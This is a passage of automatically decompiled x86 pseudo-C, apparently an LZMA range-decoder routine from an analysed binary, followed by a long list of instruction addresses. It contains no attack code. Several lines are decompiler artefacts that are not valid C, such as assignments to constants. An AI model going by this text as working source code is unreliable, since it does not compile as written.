											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                        0x00000000
                        0x0040680a
                        0x0040680a
                        0x0040680e
                        0x00406833
                        0x0040683d
                        0x00000000
                        0x00406810
                        0x00406810
                        0x00406813
                        0x00406817
                        0x0040681a
                        0x0040681d
                        0x00406821
                        0x00406821
                        0x00406824
                        0x004068fe
                        0x004068fe
                        0x00406905
                        0x00406905
                        0x00406908
                        0x0040690f
                        0x0040693c
                        0x00406940
                        0x004069a0
                        0x004069a3
                        0x004069a8
                        0x004069a9
                        0x004069ab
                        0x004069ad
                        0x004069b0
                        0x004068bc
                        0x004068bc
                        0x004068bc
                        0x00406058
                        0x00406058
                        0x00406058
                        0x00406061
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00000000
                        0x00406072
                        0x00000000
                        0x00000000
                        0x0040607b
                        0x0040607e
                        0x00406081
                        0x00406085
                        0x00000000
                        0x00000000
                        0x0040608b
                        0x0040608e
                        0x00406090
                        0x00406091
                        0x00406094
                        0x00406096
                        0x00406097
                        0x00406099
                        0x0040609c
                        0x004060a1
                        0x004060a6
                        0x004060af
                        0x004060c2
                        0x004060c5
                        0x004060d1
                        0x004060f9
                        0x004060fb
                        0x00406109
                        0x00406109
                        0x0040610d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004060fd
                        0x004060fd
                        0x00406100
                        0x00406101
                        0x00406101
                        0x00000000
                        0x004060fd
                        0x004060d7
                        0x004060dc
                        0x004060dc
                        0x004060e5
                        0x004060ed
                        0x004060f0
                        0x00000000
                        0x004060f6
                        0x004060f6
                        0x00000000
                        0x004060f6
                        0x00000000
                        0x00406113
                        0x00406113
                        0x00406117
                        0x004069c3
                        0x00000000
                        0x004069c3
                        0x00406120
                        0x00406130
                        0x00406133
                        0x00406136
                        0x00406136
                        0x00406136
                        0x00406139
                        0x0040613d
                        0x00000000
                        0x00000000
                        0x0040613f
                        0x00406145
                        0x0040616f
                        0x00406175
                        0x0040617c
                        0x00000000
                        0x0040617c
                        0x0040614b
                        0x0040614e
                        0x00406153
                        0x00406153
                        0x0040615e
                        0x00406166
                        0x00406169
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061ae
                        0x004061b4
                        0x004061b7
                        0x004061c4
                        0x004061cc
                        0x00000000
                        0x00000000
                        0x00406183
                        0x00406183
                        0x00406187
                        0x004069d2
                        0x00000000
                        0x004069d2
                        0x00406193
                        0x0040619e
                        0x0040619e
                        0x0040619e
                        0x004061a1
                        0x004061a4
                        0x004061a7
                        0x004061ac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406843
                        0x00406843
                        0x00406849
                        0x0040684f
                        0x00406855
                        0x0040686f
                        0x00406872
                        0x00406878
                        0x00406883
                        0x00406883
                        0x00406885
                        0x00406857
                        0x00406857
                        0x00406866
                        0x0040686a
                        0x0040686a
                        0x0040688f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406891
                        0x00406895
                        0x00406a44
                        0x00000000
                        0x00406a44
                        0x004068a1
                        0x004068a8
                        0x004068b0
                        0x004068b3
                        0x004068b6
                        0x004068b6
                        0x00000000
                        0x00000000
                        0x004061d4
                        0x004061d6
                        0x004061d9
                        0x0040624a
                        0x0040624d
                        0x00406250
                        0x00406257
                        0x00406261
                        0x00000000
                        0x00406261
                        0x004061db
                        0x004061df
                        0x004061e2
                        0x004061e4
                        0x004061e7
                        0x004061ea
                        0x004061ec
                        0x004061ef
                        0x004061f1
                        0x004061f6
                        0x004061f9
                        0x004061fc
                        0x00406200
                        0x00406207
                        0x0040620a
                        0x00406211
                        0x00406215
                        0x0040621d
                        0x0040621d
                        0x0040621d
                        0x00406217
                        0x00406217
                        0x00406217
                        0x0040620c
                        0x0040620c
                        0x0040620c
                        0x00406221
                        0x00406224
                        0x00406242
                        0x00406244
                        0x00000000
                        0x00406226
                        0x00406226
                        0x00406229
                        0x0040622c
                        0x0040622f
                        0x00406231
                        0x00406231
                        0x00406231
                        0x00406234
                        0x00406237
                        0x00406239
                        0x0040623a
                        0x0040623d
                        0x00000000
                        0x0040623d
                        0x00000000
                        0x00406473
                        0x00406477
                        0x00406495
                        0x00406498
                        0x0040649f
                        0x004064a2
                        0x004064a5
                        0x004064a8
                        0x004064ab
                        0x004064ae
                        0x004064b0
                        0x004064b7
                        0x004064b8
                        0x004064ba
                        0x004064bd
                        0x004064c0
                        0x004064c3
                        0x004064c3
                        0x004064c8
                        0x00000000
                        0x004064c8
                        0x00406479
                        0x0040647c
                        0x0040647f
                        0x00406489
                        0x00000000
                        0x00000000
                        0x004064dd
                        0x004064e1
                        0x00406504
                        0x00406507
                        0x0040650a
                        0x00406514
                        0x004064e3
                        0x004064e3
                        0x004064e6
                        0x004064e9
                        0x004064ec
                        0x004064f9
                        0x004064fc
                        0x004064fc
                        0x00000000
                        0x00000000
                        0x00406520
                        0x00406524
                        0x00000000
                        0x00000000
                        0x0040652a
                        0x0040652e
                        0x00000000
                        0x00000000
                        0x00406534
                        0x00406536
                        0x0040653a
                        0x0040653a
                        0x0040653d
                        0x00406541
                        0x00000000
                        0x00000000
                        0x00406591
                        0x00406595
                        0x0040659c
                        0x0040659f
                        0x004065a2
                        0x004065ac
                        0x00000000
                        0x004065ac
                        0x00406597
                        0x00000000
                        0x00000000
                        0x004065b8
                        0x004065bc
                        0x004065c3
                        0x004065c6
                        0x004065c9
                        0x004065be
                        0x004065be
                        0x004065be
                        0x004065cc
                        0x004065cf
                        0x004065d2
                        0x004065d2
                        0x004065d5
                        0x004065d8
                        0x004065db
                        0x004065db
                        0x004065de
                        0x004065e5
                        0x004065ea
                        0x00000000
                        0x00000000
                        0x00406678
                        0x00406678
                        0x0040667c
                        0x00406a1a
                        0x00000000
                        0x00406a1a
                        0x00406682
                        0x00406685
                        0x00406688
                        0x0040668c
                        0x0040668f
                        0x00406695
                        0x00406697
                        0x00406697
                        0x00406697
                        0x0040669a
                        0x0040669d
                        0x00000000
                        0x00000000
                        0x0040626d
                        0x0040626d
                        0x00406271
                        0x004069de
                        0x00000000
                        0x004069de
                        0x00406277
                        0x0040627a
                        0x0040627d
                        0x00406281
                        0x00406284
                        0x0040628a
                        0x0040628c
                        0x0040628c
                        0x0040628c
                        0x0040628f
                        0x00406292
                        0x00406292
                        0x00406295
                        0x00406298
                        0x00000000
                        0x00000000
                        0x0040629e
                        0x004062a4
                        0x00000000
                        0x00000000
                        0x004062aa
                        0x004062aa
                        0x004062ae
                        0x004062b1
                        0x004062b4
                        0x004062b7
                        0x004062ba
                        0x004062bb
                        0x004062be
                        0x004062c0
                        0x004062c6
                        0x004062c9
                        0x004062cc
                        0x004062cf
                        0x004062d2
                        0x004062d5
                        0x004062d8
                        0x004062f4
                        0x004062f7
                        0x004062fa
                        0x004062fd
                        0x00406304
                        0x00406308
                        0x0040630a
                        0x0040630e
                        0x004062da
                        0x004062da
                        0x004062de
                        0x004062e6
                        0x004062eb
                        0x004062ed
                        0x004062ef
                        0x004062ef
                        0x00406311
                        0x00406318
                        0x0040631b
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406326
                        0x00406326
                        0x0040632a
                        0x004069ea
                        0x00000000
                        0x004069ea
                        0x00406330
                        0x00406333
                        0x00406336
                        0x0040633a
                        0x0040633d
                        0x00406343
                        0x00406345
                        0x00406345
                        0x00406345
                        0x00406348
                        0x0040634b
                        0x0040634b
                        0x0040634b
                        0x00406351
                        0x00000000
                        0x00000000
                        0x00406353
                        0x00406356
                        0x00406359
                        0x0040635c
                        0x0040635f
                        0x00406362
                        0x00406365
                        0x00406368
                        0x0040636b
                        0x0040636e
                        0x00406371
                        0x00406389
                        0x0040638c
                        0x0040638f
                        0x00406392
                        0x00406392
                        0x00406395
                        0x00406399
                        0x0040639b
                        0x00406373
                        0x00406373
                        0x0040637b
                        0x00406380
                        0x00406382
                        0x00406384
                        0x00406384
                        0x0040639e
                        0x004063a5
                        0x004063a8
                        0x00000000
                        0x004063aa
                        0x00000000
                        0x004063aa
                        0x004063a8
                        0x004063af
                        0x004063af
                        0x004063af
                        0x004063af
                        0x00000000
                        0x00000000
                        0x004063ea
                        0x004063ea
                        0x004063ee
                        0x004069f6
                        0x00000000
                        0x004069f6
                        0x004063f4
                        0x004063f7
                        0x004063fa
                        0x004063fe
                        0x00406401
                        0x00406407
                        0x00406409
                        0x00406409
                        0x00406409
                        0x0040640c
                        0x0040640f
                        0x0040640f
                        0x00406415
                        0x004063b3
                        0x004063b3
                        0x004063b6
                        0x00000000
                        0x004063b6
                        0x00406417
                        0x00406417
                        0x0040641a
